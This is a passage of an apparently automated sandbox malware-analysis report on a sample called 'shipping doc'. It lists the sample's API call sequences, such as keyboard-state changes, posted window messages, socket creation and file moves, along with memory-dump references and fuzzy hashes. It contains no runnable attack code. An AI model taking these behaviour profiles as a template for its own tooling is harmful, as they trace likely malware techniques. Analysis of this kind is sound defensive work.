                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                              • String ID:
                                                                                              • API String ID: 2550207440-0
                                                                                              • Opcode ID: 87eac522d9f57e06bd87f02596bcf79ea5311823181f30a5b5f44f0c032ad540
                                                                                              • Instruction ID: f1c24d7631f9d2fe7d4787d9a1f61778101e1cc1d9214a886880ba1171e00526
                                                                                              • Opcode Fuzzy Hash: 87eac522d9f57e06bd87f02596bcf79ea5311823181f30a5b5f44f0c032ad540
                                                                                              • Instruction Fuzzy Hash: A891D372A00209EFDB02DFA4C885BFE77B5FF45316F214029E921EB291D774A949CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                              • String ID:
                                                                                              • API String ID: 3225163088-0
                                                                                              • Opcode ID: 44c89ddb61bad418198ec42ef815aeb0ebedd16228a94b3b3b32a1e9c2b48c20
                                                                                              • Instruction ID: aaac1d388c5971a5bdd4b5ae8c1e5b677fbc3590fbb84e2e26c91b0a94977f25
                                                                                              • Opcode Fuzzy Hash: 44c89ddb61bad418198ec42ef815aeb0ebedd16228a94b3b3b32a1e9c2b48c20
                                                                                              • Instruction Fuzzy Hash: 61913771D00219EFCB15CFA9CC84AEEBBB8FF49720F148159E615B7291D374A981DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 0016396B
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00163A7A
                                                                                              • _wcslen.LIBCMT ref: 00163A8A
                                                                                              • VariantClear.OLEAUT32(?), ref: 00163C1F
                                                                                                • Part of subcall function 00150CDF: VariantInit.OLEAUT32(00000000), ref: 00150D1F
                                                                                                • Part of subcall function 00150CDF: VariantCopy.OLEAUT32(?,?), ref: 00150D28
                                                                                                • Part of subcall function 00150CDF: VariantClear.OLEAUT32(?), ref: 00150D34
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                              • API String ID: 4137639002-1221869570
                                                                                              • Opcode ID: 9e13b225145f2be0c91d7bd1c3f9a71a895c5ddc47ca1b8afb98267236330fb9
                                                                                              • Instruction ID: 9096d1ba58ffd78483ecf1ff3138c00b38ac8da9649a2b262709279b18bba25c
                                                                                              • Opcode Fuzzy Hash: 9e13b225145f2be0c91d7bd1c3f9a71a895c5ddc47ca1b8afb98267236330fb9
                                                                                              • Instruction Fuzzy Hash: 219188756083459FC704EF24C88096AB7E5FF89314F14882EF89A9B352DB30EE45CB82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0014000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0013FF41,80070057,?,?,?,0014035E), ref: 0014002B
                                                                                                • Part of subcall function 0014000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0013FF41,80070057,?,?), ref: 00140046
                                                                                                • Part of subcall function 0014000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0013FF41,80070057,?,?), ref: 00140054
                                                                                                • Part of subcall function 0014000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0013FF41,80070057,?), ref: 00140064
                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00164C51
                                                                                              • _wcslen.LIBCMT ref: 00164D59
                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00164DCF
                                                                                              • CoTaskMemFree.OLE32(?), ref: 00164DDA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                              • String ID: NULL Pointer assignment
                                                                                              • API String ID: 614568839-2785691316
                                                                                              • Opcode ID: 82670041991cbbdc99935eb90f1400379f39f6d68ecf518a48bc07a6ecac9358
                                                                                              • Instruction ID: 79d5cf7f55a6b5db1f0e43a4eee26d5ef06ced608d8c88d2e8839bf310caa1e0
                                                                                              • Opcode Fuzzy Hash: 82670041991cbbdc99935eb90f1400379f39f6d68ecf518a48bc07a6ecac9358
                                                                                              • Instruction Fuzzy Hash: 56912671D00219AFDF14DFA4DC91AEEB7B9BF08310F108169E919B7251EB35AA54CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenu.USER32(?), ref: 00172183
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 001721B5
                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001721DD
                                                                                              • _wcslen.LIBCMT ref: 00172213
                                                                                              • GetMenuItemID.USER32(?,?), ref: 0017224D
                                                                                              • GetSubMenu.USER32(?,?), ref: 0017225B
                                                                                                • Part of subcall function 00143A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00143A57
                                                                                                • Part of subcall function 00143A3D: GetCurrentThreadId.KERNEL32 ref: 00143A5E
                                                                                                • Part of subcall function 00143A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001425B3), ref: 00143A65
                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001722E3
                                                                                                • Part of subcall function 0014E97B: Sleep.KERNEL32 ref: 0014E9F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 4196846111-0
                                                                                              • Opcode ID: eefe6a13427208136794e9ee563ddf78b7bbe18c6b11e420b570ca8bee9ec04a
                                                                                              • Instruction ID: e3fd83757621178bf7768b91f2d4b9cc928ffab48d55e2917b491240eb4b2a44
                                                                                              • Opcode Fuzzy Hash: eefe6a13427208136794e9ee563ddf78b7bbe18c6b11e420b570ca8bee9ec04a
                                                                                              • Instruction Fuzzy Hash: A9719F75A00205AFCB14DF65C885AAEB7F1FF48310F158469E95AEB352DB34EE428B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 0014AEF9
                                                                                              • GetKeyboardState.USER32(?), ref: 0014AF0E
                                                                                              • SetKeyboardState.USER32(?), ref: 0014AF6F
                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 0014AF9D
                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0014AFBC
                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 0014AFFD
                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0014B020
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: ed2de9021bc42150a9e93a43244bb2ec8225f299ad95a9f37495cfa524350388
                                                                                              • Instruction ID: f8c3ae630022af0bba34378dd838ad1d5d199ba95ef4669809728fcb22915f92
                                                                                              • Opcode Fuzzy Hash: ed2de9021bc42150a9e93a43244bb2ec8225f299ad95a9f37495cfa524350388
                                                                                              • Instruction Fuzzy Hash: 0451C1A06487D53DFB3683348885BBBBEA95F06304F098589F1E9568E2C3D8EDC8D751
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetParent.USER32(00000000), ref: 0014AD19
                                                                                              • GetKeyboardState.USER32(?), ref: 0014AD2E
                                                                                              • SetKeyboardState.USER32(?), ref: 0014AD8F
                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0014ADBB
                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0014ADD8
                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0014AE17
                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0014AE38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: fc3d9de72c03293eebe5817ee546aaf9b77a8cec602b776ee847b03f5358b3dd
                                                                                              • Instruction ID: b731999cb064603cc87b408a0018e4ec8910989893d2075063a7a22ee6b9fb2e
                                                                                              • Opcode Fuzzy Hash: fc3d9de72c03293eebe5817ee546aaf9b77a8cec602b776ee847b03f5358b3dd
                                                                                              • Instruction Fuzzy Hash: 755107A09887D13DFB3783748C95BBA7EA85F45300F498488E1E9568E3C394EC84D752
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(00123CD6,?,?,?,?,?,?,?,?,00115BA3,?,?,00123CD6,?,?), ref: 00115470
                                                                                              • __fassign.LIBCMT ref: 001154EB
                                                                                              • __fassign.LIBCMT ref: 00115506
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00123CD6,00000005,00000000,00000000), ref: 0011552C
                                                                                              • WriteFile.KERNEL32(?,00123CD6,00000000,00115BA3,00000000,?,?,?,?,?,?,?,?,?,00115BA3,?), ref: 0011554B
                                                                                              • WriteFile.KERNEL32(?,?,00000001,00115BA3,00000000,?,?,?,?,?,?,?,?,?,00115BA3,?), ref: 00115584
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 6f25feb3d7bffaffb37c67f6c29285436a6a41c4cd08911600b12d016682addd
                                                                                              • Instruction ID: d07bbd562614cd8dd39d7ed8705e416276ede42eb11109a573a910b0587d23fa
                                                                                              • Opcode Fuzzy Hash: 6f25feb3d7bffaffb37c67f6c29285436a6a41c4cd08911600b12d016682addd
                                                                                              • Instruction Fuzzy Hash: 9F51C571A00649DFDB15CFA8D845AEEBBFAEF49300F14412EF555E7291E7309A81CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00102D4B
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00102D53
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00102DE1
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00102E0C
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00102E61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: d1e56e44583ea5e181c94cdd3443ed4e2f90361b3a33a95b47d407a73acca679
                                                                                              • Instruction ID: 0202120cd5102d82793fcd2019e4b9a434a47dea3040c52e7e83c5f4356a9a10
                                                                                              • Opcode Fuzzy Hash: d1e56e44583ea5e181c94cdd3443ed4e2f90361b3a33a95b47d407a73acca679
                                                                                              • Instruction Fuzzy Hash: F641A334A00209ABCF14DFA8C849A9EBBB5BF45324F148195E8546B3D2D7B1AE45CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0016304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0016307A
                                                                                                • Part of subcall function 0016304E: _wcslen.LIBCMT ref: 0016309B
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00161112
                                                                                              • WSAGetLastError.WSOCK32 ref: 00161121
                                                                                              • WSAGetLastError.WSOCK32 ref: 001611C9
                                                                                              • closesocket.WSOCK32(00000000), ref: 001611F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 2675159561-0
                                                                                              • Opcode ID: 2e1d068e92eb20b805e47018931c39ca313ba3ebf7960ffdcd5440118365f10d
                                                                                              • Instruction ID: be3851434c4586ee2c58ec930d96dd284e121f36b61c9fa0cd06b6cc679db560
                                                                                              • Opcode Fuzzy Hash: 2e1d068e92eb20b805e47018931c39ca313ba3ebf7960ffdcd5440118365f10d
                                                                                              • Instruction Fuzzy Hash: 4641D431600604AFDB109F24CC85BAAB7F9EF46324F188059FD19AB292C774AD81CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0014DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0014CF22,?), ref: 0014DDFD
                                                                                                • Part of subcall function 0014DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0014CF22,?), ref: 0014DE16
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0014CF45
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0014CF7F
                                                                                              • _wcslen.LIBCMT ref: 0014D005
                                                                                              • _wcslen.LIBCMT ref: 0014D01B
                                                                                              • SHFileOperationW.SHELL32(?), ref: 0014D061
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 3164238972-1173974218
                                                                                              • Opcode ID: 55bf71dde3ee9946c933ea75aca0cd411604215529d1c86635744e695469bc6c
                                                                                              • Instruction ID: ef83a6e9699e510cce2270772cd7af9aaa25be398c36fda4f72d62f577737125
                                                                                              • Opcode Fuzzy Hash: 55bf71dde3ee9946c933ea75aca0cd411604215529d1c86635744e695469bc6c
                                                                                              • Instruction Fuzzy Hash: 4B4169719452189FDF12EFA4D981ADE77F9AF18340F1000E6E549E7152EB35A688CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00172E1C
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00172E4F
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00172E84
                                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00172EB6
                                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00172EE0
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00172EF1
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00172F0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 2178440468-0
                                                                                              • Opcode ID: b7ed7f20a780e68d98981d704ff77d734f542deb966c2020da14782101a03d43
                                                                                              • Instruction ID: 65a844dc3e66e08e54aee48de2ea28087190a440e6468baf2f76201b1ccca58f
                                                                                              • Opcode Fuzzy Hash: b7ed7f20a780e68d98981d704ff77d734f542deb966c2020da14782101a03d43
                                                                                              • Instruction Fuzzy Hash: 8E310430604250AFEB21CF58DC94FA537F1FB9A714F1541A8F9489F6B2CB71A881DB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00147769
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0014778F
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00147792
                                                                                              • SysAllocString.OLEAUT32(?), ref: 001477B0
                                                                                              • SysFreeString.OLEAUT32(?), ref: 001477B9
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 001477DE
                                                                                              • SysAllocString.OLEAUT32(?), ref: 001477EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: 6148f1557099586119020d3cc17590bc0284fe240ed87c96db6f541deaa68c67
                                                                                              • Instruction ID: ae750584fb4d1b6fad8a4587bef167eb9e602735d39e7f678029b218b3e108d3
                                                                                              • Opcode Fuzzy Hash: 6148f1557099586119020d3cc17590bc0284fe240ed87c96db6f541deaa68c67
                                                                                              • Instruction Fuzzy Hash: FE21A176604219AFDF10EFA8CC88CBB77ACEF097657448429FA19DB1A1D770DC8587A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00147842
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00147868
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0014786B
                                                                                              • SysAllocString.OLEAUT32 ref: 0014788C
                                                                                              • SysFreeString.OLEAUT32 ref: 00147895
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 001478AF
                                                                                              • SysAllocString.OLEAUT32(?), ref: 001478BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: 3e495a719b43706d692a3c232149ec2544bc848db93b1aaae8375c8408ca2ab2
                                                                                              • Instruction ID: 7c5dbfadf5d045371f948ab2aec99311e124b6ba7de6137c85394163a32020e3
                                                                                              • Opcode Fuzzy Hash: 3e495a719b43706d692a3c232149ec2544bc848db93b1aaae8375c8408ca2ab2
                                                                                              • Instruction Fuzzy Hash: 8A214175608205AFDB109FA8DC8CDBA77ECEB097607108125F915DB2B1DB74DC81CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 001504F2
